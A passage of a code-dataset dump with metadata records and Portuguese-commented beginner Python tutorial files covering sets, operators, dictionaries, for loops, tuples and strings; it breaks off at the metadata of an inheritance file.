'cachorro', 'elefante'}\n\nprint(len(set_animais))\n\n'''\nPara removermos itens de um conjunto, \nusamos o método remove() ou o método discard().\n'''\n\n# Uso do remove():\n\nset_frutas = {'abacate', 'banana', 'cereja'}\n\nset_frutas.remove('abacate')\n\nprint(set_frutas)\n\n# Uso do discard():\n\nset_frutas = {'abacate', 'banana', 'cereja'}\n\nset_frutas.discard('abacate')\n\nprint(set_frutas)\n\n'''\nPara removermos o últmo item de um conjunto, \nusamos o método pop() e para limparmos um conjunto o método clear().\n'''\n\n# Uso do pop():\n\nset_frutas = {'abacate', 'banana', 'cereja'}\n\nfrutas_restante = set_frutas.pop()\n\nprint(frutas_restante) # Retorna o item removido\nprint(set_frutas) # Conjunto de frutas restantes\n\n# Uso do clear():\n\nset_frutas = {'abacate', 'banana', 'cereja'}\n\nset_frutas.clear()\n\nprint(set_frutas) # Retorna conjunto vazio 'set()'\n\n'''\nUnião de Conjuntos (Union of Sets)\nPodemos usar o método union(), que retorna um novo conjunto contendo todos os itens dos dois conjuntos, \nou o método update() que insere todos os itens de um conjunto em outro.\n'''\n\n# Uso do union():\n\nset_letras = {'a', 'b', 'c'}\nset_numeros = {1, 2, 3}\n\nset_uniao = set_letras.union(set_numeros)\nprint(set_uniao)\n\n# Uso do update()\n\nset_letras = {'a', 'b', 'c'}\nset_numeros = {1, 2, 3}\n\nset_letras.update(set_numeros)\nprint(set_letras)\n\n'''\nConstrutor set() (The set() Constructor)\n\nÉ possível usar o construtor set() para gerar um conjunto.\n'''\n# Exemplo:\n\nset_frutas_with_constructor = set(\n ('maca', 'banana', 'cereja')) # uso de duplo parênteses\nprint(set_frutas_with_constructor)\n"
},
{
"alpha_fraction": 0.6393969655036926,
"alphanum_fraction": 0.6572864055633545,
"avg_line_length": 16.456140518188477,
"blob_id": "583f4e77fd6cbef03239c6b1cd269199ffa19af0",
"content_id": "059c7633898da94bb66dbc2f04a78c566d5e5077",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5054,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 285,
"path": "/semana-2/operators.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nOperators (Operadores)\n\nOperadores em Python são usados para executar operações em variáveis e valores.\nPython divide os Operadores nos seguintes grupos:\n'''\n\n# Arithmetic operators (Operadores aritméticos)\n# Assignment operators (Operadores de atribuição)\n# Comparison operators (Operadores de comparação)\n# Logical operators (Operadores lógicos)\n# Identity operators (Operadores de identidade)\n# Membership operators (Operadores de associação)\n# Bitwise operators (Operadores bit a bit)\n\n'''\nArithmetic operators (Operadores aritméticos)\n\nSão usados com valores numéricos para executar operações matemáticas comuns.\n'''\n# Operador Addition (+)\nx = 5\ny = 3\nprint(x + y)\n\n# Operador Subtraction (-)\nx = 5\ny = 3\nprint(x - y)\n\n# Operador Multiplication (*)\nx = 5\ny = 3\nprint(x * y)\n\n# Operador Division (/)\nx = 12\ny = 3\nprint(x / y)\n\n# Operador Modulus (%)\nx = 5\ny = 2\nprint(x % y)\n\n# Operador Exponentiation (**)\nx = 2\ny = 5\nprint(x ** y) # igual a 2*2*2*2*2\n\n# Operador Floor Division (//)\nx = 15\ny = 2\nprint(x // y) # a divisão // arredonda o resultado para o número inteiro mais próximo\n\n'''\nAssignment operators (Operadores de atribuição)\n\nSão usados para atribuir valores a variáveis.\n'''\n\n# Operador (=) igual a (x = 5)\n\nx = 5\nprint(x)\n\n# Operador (+=) igual a (x = x + 3)\n\nx = 5\nx += 3\n\nprint(x)\n\n# Operador (-=) igual a (x = x - 3)\n\nx = 5\nx -= 3\n\nprint(x)\n\n# Operador (*=) igual a (x = x * 3)\n\nx = 5\nx *= 3\n\nprint(x)\n\n# Operador (/=) igual a (x = x / 3)\n\nx = 5\nx /= 3\n\nprint(x)\n\n# Operador (%=) igual a (x = x % 3)\n\nx = 5\nx %= 3\n\nprint(x)\n\n# Operador (//=) igual a (x = x // 3)\n\nx = 5\nx //= 3\n\nprint(x)\n\n# Operador (**=) igual a (x = x ** 3)\n\nx = 5\nx **= 3\n\nprint(x)\n\n# Operador (&=) igual a (x = x & 3)\n\nx = 5\nx &= 3\n\nprint(x)\n\n# Operador (|=) igual a (x = x | 3)\n\nx = 5\nx |= 3\n\nprint(x)\n\n# Operador (^=) igual a (x = x ^ 3)\n\nx = 5\nx ^= 3\n\nprint(x)\n\n# Operador (>>=) igual a (x = x >> 3)\n\nx = 5\nx >>= 3\n\nprint(x)\n\n# Operador (<<=) igual a (x = x << 3)\n\nx = 5\nx <<= 3\n\nprint(x)\n\n'''\nOperadores de comparação\nSão usados para comparar dois valores.\n'''\n\n# Exemplo:\n# Operador Igual (==)\nx = 5\ny = 3\n\nprint(x == y)\n\n# Operador Não igual (!=)\nx = 5\ny = 3\n\nprint(x != y)\n\n# Operador Maior que (>)\nx = 5\ny = 3\n\nprint(x > y)\n\n# Operador Menor que (<)\nx = 5\ny = 3\n\nprint(x < y)\n\n# Operador Maior do que ou Igual a (>=)\nx = 5\ny = 3\n\nprint(x >= y)\n\n# Operador Menor do que ou Igual a (<=)\nx = 2\ny = 3\n\nprint(x <= y)\n\n'''\nOperadores Lógicos\n\nSão usados para combinar declarações condicionais.\n'''\n\n# Operador AND (retorna True se ambas declarações forem verdadeiras).\nx = 5\n\nprint(x > 3 and x < 10)\n\n# Operador OR (retorna True se uma das declarações for verdadeira).\nx = 5\n\nprint(x > 3 or x < 4)\n\n# Operador NOT (reverte o resultado, retorna False se o resultado for verdadeiro).\nx = 5\n\nprint(not(x > 3 and 5 < 10))\n\n'''\nOPERADORES DE IDENTIDADE\n\nOs operadores de Identidade são usados para comparar os objetos, não se forem iguais,\nmas se forem realmente o mesmo objeto, com o mesmo local na memória.\n'''\n# Operador IS (retorna True se ambas variáveis forem um objeto):\n\nx = ['apple', 'banana']\ny = ['apple', 'banana']\nz = x\n\nprint(x is z)\n\n# retorna True porque Z é o mesmo objeto que X\n\nprint(x is y)\n\n# retorna False poque X não é o mesmo objeto que Y, mesmo se eles tiverem o mesmo conteúdo.\n\nprint(x == y)\n\n# para demonstrar a diferença entre \"is\" e \"==\": essa comparação retorna True porque x é igual a y.\n\n# Operador IS NOT (retorna True se ambas variáveis não forem o mesmo objeto).\n\nx = ['apple', 'banana']\ny = ['apple', 'banana']\nz = x\n\nprint(x is not z)\n\n# retorna False porque Z é o mesmo objeto x\n\nprint(x is not y)\n\n# retorna True porque X não é o mesmo objeto que Y, mesmo se eles tiverem o mesmoconteúdo.\n\nprint(x != y)\n\n# para demonstrar a difernça entre \"NOT IS\" e \"!=\"...essa comparação retorna False porque X é igual a Y.\n\n'''\nOPERADORES DE ASSOCIAÇÃO (Membership Operators)\n\nOs Operadores de Associação são usados se uma sequência é apresentada em um objeto.\n'''\n# Operador IN (retorna True se a sequência com o valor especificado estiver presente no objeto)\n\nx = ['apple', 'banana']\n\nprint('banana' in x)\n\n# Operador NOT IN (retorna True se uma sequência com o valor especificado não estiver presente no objeto)\n\nx = ['apple', 'banana']\n\nprint('pineapple' not in x)\n\n'''\nOPERADORES BITWISE (Bitwise Operators)\n\nOperadores Bitwise (bit a bit) são usados para comparar números (binários):\n\n- Operador & = AND (define cada bit como 1 se ambos bits forem 1)\n- Operador | = OR (define cada bit como 1 se um dos dois bits for 1)\n- Operador ^ = XOR (define cada bit como 1 se somente um dos dois bits for 1)\n- Operador ~ = NOT (invert todos os bits)\n- Operador << = Zero desvio à esquerda (desloca-se para a esquerda pressionando os zeros da direita e deixando os bits à esquerda de fora)\n- Operador >> = Mudança à direita (desloca-se para a direita empurrando cópias do bit mais à esquerda da esquerda e deixa os bits mais à direita de fora)\n\n'''\n"
},
{
"alpha_fraction": 0.628146231174469,
"alphanum_fraction": 0.6472533345222473,
"avg_line_length": 17.640411376953125,
"blob_id": "12abe229071d0b32ed78a46c2f2345adf570d85e",
"content_id": "2d6590fd6bf74f8fb9556a7ebf413ba7e2c83924",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5512,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 292,
"path": "/semana-2/dictionaries.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nDicionários (Dictionaries)\n\nUm dicionário é uma coleção não ordenada de itens, mutáveis e classificaveis. Em Python dicionários são escritos entre colchetes,\ne possuem vlaores e chaves.\n'''\n# Exemplo:\n\ndicionario_carros = {\n 'marca': 'fiat',\n 'modelo': 'argo',\n 'year': '2020'\n}\n\nprint(dicionario_carros)\n\n# Acessando itens - Podemos acessar itens através do nome da chave:\n\ndicionario_carros = {\n 'marca': 'fiat',\n 'modelo': 'argo',\n 'year': '2020'\n}\n\nmodelo_carro = dicionario_carros['modelo']\n\nprint(modelo_carro)\n\n# Há também o método get() que podemos utilizar para acessar os itens de uma chave:\n\ndicionario_carros = {\n 'marca': 'fiat',\n 'modelo': 'argo',\n 'year': '2020'\n}\n\nmodelo_carro = dicionario_carros.get('marca')\n\nprint(modelo_carro)\n\n'''\nAlterar Valores (Change Values)\n\nPodemos alterar um valor de um item específico, referindo-se ao seu nome de chave.\n'''\n# Exemplo:\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\ndicio_carros['modelo'] = 'Corsa'\nprint(dicio_carros)\n\n\n'''\nLoop em um dicionário (Loop Through a Dictionary)\n\nUsamos o loop for para percorrer um dicionário.\nAo percorrer um dicionário, o valor retornado é a chave do dicionário, mas existem métodos para retornar os valores também.\n'''\n\n# Retornando chaves de um dicionário:\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\nfor x in dicio_carros:\n print(x)\n\n# Retornando valores de chave de um dicionário:\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\nfor x in dicio_carros:\n print(dicio_carros[x])\n\n# Uso do método values(), para retornar os valores de um dicionário:\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\nfor x in dicio_carros.values():\n print(x)\n\n# Uso do método items(), para retornar as chaves e os valores de um dicionário:\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\nfor x, y in dicio_carros.items():\n print(x, y)\n\n'''\nVerifica se a chave existe (Check if Key Exists)\n\nPara sabermos se uma chave específica se encontra no dicionário, usamos a keyword in.\n'''\n# Exemplo:\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\nif 'ano' in dicio_carros:\n print(\"Sim, 'ano' e uma chave do dicionario dicio_carros.\")\n\n\n'''\nComprimento do dicionário (Dictinary Length)\n\nPara sabermos quantos itens (pares de chaves-valores) um dicionario possui, usamos a funcao len().\n'''\n\n# Exemplo:\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\nprint(len(dicio_carros))\n\n'''\nAdicionando itens (Adding Items)\n\nA adição de um item ao dicionário é feita usando uma nova chave de índice e atribuindo um valor e ela.\n'''\n\n# Exemplo:\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\ndicio_carros['cor'] = 'grafiti'\nprint(dicio_carros)\n\n# O método pop() remove o item de um valor de chave específica\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\ndicio_carros.pop('marca')\nprint(dicio_carros)\n\n# O método popitem() remove o último item inserido.\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\ndicio_carros.popitem()\nprint(dicio_carros)\n\n# A palavra-chave del remove o item com o nome da chave especificado.\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\ndel dicio_carros['marca']\nprint(dicio_carros)\n\n# O método clear() esvazia o dicionário\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\ndicio_carros.clear()\nprint(dicio_carros)\n\n'''\nCopiar um dicionário (Copy a Dictionary)\n\nNão podemos copiar um dicionário simplesmente digitando dicio_carros_1 = dicio_carros_2, porque dicio_carros_2 será apenas uma referência\nao dicio_carros_1, e as alterações feitas no dicio_carros_1 também serão feitas do dicio_carros_2.\n\nExistem maneiras de se fazer uma cópia, uma maneira é usar o bult-in copy() do dicionário.\n'''\n# Exemplo:\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\nmeu_dicionario = dicio_carros.copy()\nprint(meu_dicionario)\n\n# Outra maneira de se fazer cópia, é com uso da função bult-in dict():\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2021'\n}\n\nmeu_dicionario = dict(dicio_carros)\nprint(meu_dicionario)\n\n'''\nDicionários aninhados (Nested Dictionaries)\n\nUm dicionário também pode conter muitos dicionários.\n'''\n# Exemplo:\n\nmeus_cursos_programacao = {\n 'beginner': {\n 'HTML': '5',\n 'horas': 100\n\n },\n 'intermediate': {\n 'JavaScript': 'ES6',\n 'horas': 200\n },\n 'advanced': {\n 'Python': '3',\n 'horas': 300\n }\n}\n\nprint(meus_cursos_programacao)\n\n# Podemos ainda, aninhar três dicionários que já existem como dicionários:\n\nbeginner = {\n 'HTML': '5',\n 'horas': 100\n\n}\n\nintermediate = {\n 'JavaScript': 'ES6',\n 'horas': 200\n}\n\nadvanced = {\n 'Python': '3',\n 'horas': 300\n}\n\nmeus_cursos_programacao_2 = {\n 'beginner': beginner,\n 'intermediate': intermediate,\n 'advanced': advanced\n}\n\nprint(meus_cursos_programacao_2)\n\n'''\nO construtor dict() (The dict() Constructor)\n\nTambém é possível usar o construtor dict() para criar um novo dicionário.\n'''\n# Exemplo:\n\ndicio_carros = dict(marca='Ford', modelo='Fusion', year=2020)\n\nprint(dicio_carros)\n"
},
{
"alpha_fraction": 0.6587791442871094,
"alphanum_fraction": 0.6714677810668945,
"avg_line_length": 23.711864471435547,
"blob_id": "92cf14e7def51f0f986fb99e31c276f69fa23aae",
"content_id": "d501e87835190b5790de790ac9835b8dd07cdc67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2972,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 118,
"path": "/semana-3/for_loops.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nFor Loops\n\nUm loop for é usado para iterar sobre uma sequência (percorre uma lista, tupla, dicionário, conjunto de string).\n'''\n# Exemplo:\n\nfrutas = ['amora', 'banana', 'cereja', 'goiaba', 'morango', 'uva']\nfor f in frutas:\n print(f)\n\n'''\nLoop atrevés de uma String\n\nMesmo as Strings são objetos iteráveis, elas contém uma sequência de caracteres.\n'''\n# Exemplo:\n\nfor f in 'banana':\n print(f)\n\n'''\nA declaração Break\n\nCom o Break, podemos parar o loop antes que ele percorra todos os itens.\n'''\n# Exemplo 1 - saia do loop quando f for 'cereja':\n\nfrutas = ['amora', 'banana', 'cereja', 'goiaba', 'morango', 'uva']\nfor f in frutas:\n print(f)\n if f == 'cereja':\n break\n\n# Exemplo 2 - saia do loop quando f for 'cereja', mas desta vez a quebra ocorre antes do print:\n\nfrutas = ['amora', 'banana', 'cereja', 'goiaba', 'morango', 'uva']\nfor f in frutas:\n if f == 'cereja':\n break\n print(f)\n\n'''\nA declaração Continue\n\nCom a declaração continue, podemos parar a iteração atual do loop a continuar com a próxima\n'''\n# Exemplo - não imprima 'cereja':\n\nfrutas = ['amora', 'banana', 'cereja', 'goiaba', 'morango', 'uva']\nfor f in frutas:\n if f == 'cereja':\n continue\n print(f)\nfrutas = ['amora', 'banana', 'cereja', 'goiaba', 'morango', 'uva']\nfor f in frutas:\n if f == 'cereja':\n break\n print(f)\n\n'''\nA função range()\n\nPara percorrer um conjunto de itens um número específico de vezes, podemos usar a função range().\n\nA função range() retorna uma sequência de números, iniciando em 0 por padrão e incrementando em 1 (por padrão), e termina em um número especificado.\n'''\n# Exemplo:\n\nfor numeros in range(7):\n print(numeros)\n\n# É possível especificar o valor inicial adicionando uma parâmetro: range(2,7), que significa de 2 a 7 (mas não inclui o 7):\n\nfor numeros in range(2, 7):\n print(numeros)\n\n# A função range() por padrão incrementa de 1 em 1, no entanto, é possível especificar o valor do incremento adicionando um terceiro parâmetro: range(2,20,2):\n\nfor numeros in range(2, 20, 2):\n print(numeros)\n\n'''\nElse no loop For\n\nO else especifica um bloco de código a ser executado quando o loop for concluído.\n'''\n# Exemplo - imprima todos os números de 0 a 20 e imprima uma mensagem quando o loop terminar:\n\nfor x in range(20):\n print(x)\nelse:\n print('Fim!')\n\n'''\nLoops Aninhados\n\nUm loop aninhado é um loop dentro de outro loop.\nO 'loop interno' será executado uma vez para cada iteração do 'loop externo'.\n'''\n# Exemplo - imprima um adjetivo para cada fruta:\n\nadjetivo = ['vermelho(a)', 'grande', 'saboroso(a)']\nfrutas = ['maçã', 'banana', 'cereja']\n\nfor x in adjetivo:\n for y in frutas:\n print(x, y)\n\n'''\nA Declaração pass\n\nOs loops for não podem estar vazios, mas se, por algum motivo, tivermos um loop sem conteúdo, inserimos a instrução PASS para evitar erros.\n'''\n# Exemplo:\n\nfor numeros in [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]:\n pass\n"
},
{
"alpha_fraction": 0.6969696879386902,
"alphanum_fraction": 0.7060117125511169,
"avg_line_length": 25.406452178955078,
"blob_id": "4a30168eb6391b52d90a84914db68fdc3cd58833",
"content_id": "dd425fef2a830e769c58dda93d6845d03ff32337",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4157,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 155,
"path": "/semana-2/tuples.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nTUPLAS\n\nTupla é uma coleção de dados ordenados e imutável. Em Python Tuplas são declaradas entre parênteses.\n'''\ntuplaFrutas = ('abacate', 'banana', 'caju')\nprint(tuplaFrutas)\n\n# Acessando itens de uma Tupla\n\ntuplaFrutas = ('abacate', 'banana', 'caju')\nprint(tuplaFrutas[1])\n\n# Indices negativos (significa começar do fim, -1 refere-se ao último item, -2 ao segundo último item e etc.)\n\ntuplaFrutas = ('abacate', 'banana', 'caju')\nprint(tuplaFrutas[-1])\n\n# Ordenar Indices (Range of Indexes) - Podemos definir uma ordem de índices, definindo onde iniciar e onde terminar.\n# Quando definimos uma ordem, o valor de retorno sempre será uma nova Tupla com os itens especificados.\n# Exemplo - (Retorna o terceiro, quarto e quinto item):\n\ntuplaFrutas = ('abacate', 'banana', 'caju', 'melancia',\n 'goiaba', 'manga', 'morango')\nprint(tuplaFrutas[2:5])\n\n# Ordem negativa de índices (Range of Negative Indexes)\n# Exemplo - (Retorna o item do índice -4 (incluído) até o índice -1 (excluído)):\n\ntuplaFrutas = ('abacate', 'banana', 'caju', 'melancia',\n 'goiaba', 'manga', 'morango')\nprint(tuplaFrutas[-4:-1])\n\n'''\nAlterar valores de uma tupla (Change Tuple Values)\n\nDepois que uma tupla é criada, não podemos alterar seus valores. Tuplas são imutáveis imutáveis, como tmabém é chamando.\n\nMas há uma solução alternativa. Podemos converter uma tupla em lista, alterar a lista e converter a lista novamnete em uma tupla.\n'''\n# Exemplo:\nx = ('abacate', 'pera', 'morango')\ny = list(x)\ny[1] = 'kiwi'\nx = tuple(y)\n\nprint(x)\n\n# LOOP ATRAVÉS DE UMA TUPLA (Loop Through a Tuple)\n# Podemos percorrer os itens de uma tupla usando o for loop.\n# Exemplo:\n\ntuplaFrutas = ('ameixa', 'banana', 'caqui')\nfor x in tuplaFrutas:\n print(x)\n\n# VERIFICAR SE O ITEM EXISTE\n# Para vereficarmos se um item específico está presente em uma tupla, usamos a palavra chave IN.\n# Exemplo:\n\ntuplaFrutas = ('ameixa', 'banana', 'caqui')\nif 'banana' in tuplaFrutas:\n print('Success! Banana esta presente em tupla frutas.')\n\n# COMPRIMENTO DE UMA TUPLA (Tuple Length)\n# Para verificarmos quantos itens possui uma tupla, usamos o método LEN().\n# Exemplo:\n\ntuplaFrutas = ('ameixa', 'banana', 'caqui')\nprint(len(tuplaFrutas))\n\n'''\nADIÇÃO DE ITENS (Add Items)\nUma vez que a tupla é criada, não podemos adicionar itens a ela. Tuplas são IMUTÁVEIS.\n'''\n# Exemplo:\n\ntuplaFrutas = ('ameixa', 'banana', 'caqui')\ntuplaFrutas[3] = 'morango' # Isso vai retornar um TypeError.\nprint(tuplaFrutas)\n\n'''\nCRIAÇÃO DE UMA TUPLA COM UM ITEM (Create Tuple With One Item)\nPara criar uma tupla com apenas um item, podemos adicionar uma vírgula depois do item, caso contrário, o Python não reconhecerá como uma tupla.\n'''\n# Exemplo:\n\ntuplaFrutas = ('ameixa',)\nprint(type(tuplaFrutas))\n\n# Não é uma tupla\n\ntuplaFrutas = ('ameixa')\nprint(type(tuplaFrutas))\n\n'''\nREMOVER ITENS (Remove Itens)\n\nTuplas são IMUTÁVEIS, sendo assim, não podemos remover seus itens, mas podemos deletar a tupla completa.\n'''\n# A palavra chave DEL pode deletar a tupla completa.\n# Exemplo:\n\ntuplaFrutas = ('ameixa', 'banana', 'caqui')\ndel tuplaFrutas\n# será mostrado um 'NameError' porque a tupla não existe mais.\nprint(tuplaFrutas)\n\n'''\nUNIÃO DE DUAS TUPLAS (Join Two Tuples)\n\nPara unir duas ou mais tuplas usamos o operador +.\n'''\n# Exemplo:\n\ntuplaLetras = ('a', 'b', 'c', 'd', 'e')\ntuplaNumeros = (1, 2, 3)\n\ntuplaUniao = tuplaLetras + tuplaNumeros\nprint(tuplaUniao)\n\n'''\nCONSTRUTOR tuple() \n\nÉ possível usar o cosntrutor tuple() para criar uma tupla.\n'''\n# Exemplo:\n\n# atenção para os duplos parênteses\nestaTupla = tuple(('abacate', 'banana', 'caju'))\nprint(estaTupla)\n\n'''\nMÉTODOS TUPLA (Tuple Methods)\n\nPython possui dois métodos que podemos usar em tuplas.\n\nMétodo count() - Retorna o número de vezez que um específico valor aparece na tupla.\nMétodo index() - Procura na tupla por um específico valor e retorna a posição de onde ele se encontra.\n'''\n# Exemplo (count()):\n\nestaTupla = (5, 8, 6, 4, 5, 7, 8, 7, 3, 1)\n\nx = estaTupla.count(5) \n\nprint(x)\n\n# Exemplo (index()):\n\nestaTupla = (5, 8, 6, 4, 5, 7, 8, 7, 3, 1)\n\nx = estaTupla.index(3) \n\nprint(x)"
},
{
"alpha_fraction": 0.70987868309021,
"alphanum_fraction": 0.7190641164779663,
"avg_line_length": 22.744855880737305,
"blob_id": "fb3e63cdbcffa2f61571c974bb5c0de5de0a6674",
"content_id": "d204c29ac65c3ff3103510695f90cad765030b36",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5865,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 243,
"path": "/semana-1/strings.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nPython Strings\n\nStrings literais\n\nStrtings literais em Python são declaradas entre aspas simples ou duplas.\n\nVocê pode exibir uma String literal com a função print().\n'''\n\n# Exemplo:\n\nprint('Hello')\nprint(\"Hello\")\n\n''' \nAtribuição de String a uma Variável\n\nAtribuir uma String a uma Variável é feita com o nome da Variável seguida por um sinal de igual e a String:\n'''\n\na = \"Hello\"\nprint(a)\n\n'''\nStrings de Multilinhas\n\nVocê pode atribuir uma String de multilinhas para uma variável, usando três aspas simples/duplas:\n'''\n# Exemplo:\n\na = \"\"\"Lorem ipsum dolor sit amet,\nconsectetur adipiscing elit,\nsed do eiusmod tempor incididunt\nut labore et dolore magna aliqua.\"\"\"\n\nprint(a)\n\n'''\nStrings são Arrays\n\nComo muitas outras linguagens de programação populares, as Strings no Python são matrizes de bytes que representam caracteres unicode.\n\nNo entanto, o Python não possui um tipo de dados de caractere; um único caractere é simplesmente uma String com comprimento 1.\n\nParênteses retos podem ser usados para acessar elementos da sequência.\n'''\n\n# Exemplo\n# Coloque o caracter na posição 1 (lembre-se de que o primeiro caracter tem a posição 0):\n\na = 'Hello, World!'\nprint(a[1])\n\n'''\nSlicing (Fatiamento)\n\nVocê pode retornar um intervalo de caracteres usando a sintaxe Slice.\n\nEspecifique o índice inicial e o final, separados por dois pontos, para retornar uma parte da sequência.\n'''\n\n# Exemplo:\n# Coloque os caracteres da posição 2 para a posição 5 (não incluídos):\n\nb = \"Hello, World!\"\nprint(b[2:5])\n\n'''\nNegative Indexing (Indexação Negativa)\n\nPodemos usar índices negativos para iniciar o slice do final de uma String.\n'''\n# Exemplo:\n\nb = 'Hello, Wolrd!'\nprint(b[-5:-2])\n\n'''\nString Length (Comprimento da String)\n\nPara obter o comprimento de uma string, usamos a função len().\n'''\n# A função len() retorna o comprimento de uma String ():\n\na = 'Hello, World!'\nprint(len(a))\n\n'''\nMétodos de String\n\nO Python possui um conjunto de métodos internos que você pode usar em Strings.\n'''\n\n# O método strip() remove qualquer espaço do início ou do final da string:\n\na = ' Hello, Wolrd! '\nprint(a.strip()) # retorna 'Hello, World!'\n\n# O método lower() retorna a string em letras minúsculas:\n\na = 'Hello, World!'\nprint(a.lower())\n\n# O método upper() retorna a string em letras maiúsculas:\n\na = 'Hello, World!'\nprint(a.upper())\n\n# O método replace() substitui uma string por outra string:\n\na = 'Hello, World!'\nprint(a.replace('H', 'J'))\n\n# O método split() divide a sequência em substrings se encontrar instâncias do separador:\n\na = 'Hello, World!'\nprint(a.split(',')) # retorna ['Hello', 'World!']\n\n'''\nCheck String (Verificar String)\n\nPara verificar se uma determinada frase ou caracter está presente em uma string, podemos usar\nas palavras-chvave in ou not in.\n'''\n\n# Exemplo - Check se a frase 'ain' está presente no seguinte texto:\n\ntxt = 'The rain in Spain stays mainly in the plain.'\nx = 'ain' in txt\nprint(x)\n\n# Exemplo - Check se na frase 'ain' NÃO está presente no seguinte texto:\n\ntxt = 'The rain in Spain stays mainly in the plain.'\nx = 'ain' not in txt\nprint(x)\n\n'''\nString Concatenation (Concatenação de strings)\n\nPara concatenar ou combinar duas sequências, podemos usar o operador +.\n'''\n# Exemplo:\n# Mesclar a variável A com a variável B dentro da variável C:\n\na = 'Hello '\nb = 'World'\nc = a + b\nprint(c)\n\n'''\nString Format (Formato de cadeia)\n\nNão podemos combinar (concatenar) uma sequência do tipo String com um Integer, isso resultará em TypeError.\n'''\n\n# Exemplo:\n\nage = 36\ntxt = 'My name is John, I am ' + age\nprint(txt)\n\n'''\nMas podemos combinar Strings com Números usando o método format().\n\nO método format() pega os argumentos passados, formata-os e coloca-os na String \nem que os espaços reservados {} estão.\n'''\n# Exemplo:\n# Use o método format() para inserir Números dentro de Strings:\n\nage = 36\ntxt = 'My name is John, and I am {}'\nprint(txt.format(age))\n\n# O método format() recebe um número ilimitado de argumentos que são colocados nos respectivos espaços reservados:\n\nquantity = 3\nitemno = 567\nprice = 49.95\nmyorder = 'I want {} pieces of item {} for {} dollars.'\nprint(myorder.format(quantity, itemno, price))\n\n# Podemos usar números de índice {0} para garantir que os argumentos sejam colocados nos espaços reservados corretamente:\n\nquantity = 3\nitemno = 567\nprice = 49.95\nmyorder = 'I want to pay {2} dollars for {0} pieces of item {1}.'\nprint(myorder.format(quantity, itemno, price))\n\n'''\nEscape Character (Caracteres de Escape)\n\nPara inserir caracteres que são ilegais em uma string, usamos Caracteres de Escape.\nUm Caractere de Escape é uma barra invertida '\\' seguida pelo caractere que você deseja inserir.\nUm exemplo de Caractere ilegal é uma aspas duplas dentro de uma string que é cercada por aspas duplas.\n'''\n# Você receberá um erro se usar aspas duplas dentro de uma string cercada por aspas duplas:\n\n# txt = \"We are the so-called \"Vikings\" from the north.\"\nprint(txt)\n\n# Para corrigir esse problema, usamos o caractere de escape \\\".\n# O caracter de escape permite que você use aspas duplas quando normalmente não seria permitido:\n\ntxt = \"We are the so-called \\\"Vikings\\\" from the north.\"\nprint(txt)\n\n# Outros caracteres de escape usados em Python:\n\n# \\' -> Single Quote (Aspas simples)\ntxt = 'It\\'s alright.'\nprint(txt)\n\n# \\\\ -> Backslash (Barra invertida)\ntxt = 'This will insert one \\\\ (backslash).'\nprint(txt)\n\n# \\n -> New Line (Nova linha)\ntxt = 'Hello\\nWorld!'\nprint(txt)\n\n# \\r -> Carriage Return\ntxt = 'Hello\\rWorld!'\nprint(txt)\n\n# \\t -> Tab (Tabulação/Espaço)\ntxt = 'Hello\\tWorld!'\nprint(txt)\n\n# \\b -> Backspace (Retrocesso)\ntxt = 'Hello \\bWorld!'\nprint(txt)\n\n# \\ooo -> Octal value (Valor octal)\ntxt = '\\110\\145\\154\\157'\nprint(txt)\n\n# \\xhh -> Hex value (Valor hexadecimal)\ntxt = '\\x48\\x65\\x6c\\x6c\\x6f'\nprint(txt)\n"
},
{
"alpha_fraction": 0.6613665819168091,
"alphanum_fraction": 0.673184335231781,
"avg_line_length": 23.624338150024414,
"blob_id": "da5d7bcdbedd4b96127f9d48fa522fb2405935b6",
"content_id": "fef8bc7c029e31be7b41e977de5371e3d8e6f48b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4697,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 189,
"path": "/semana-3/inheritance.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
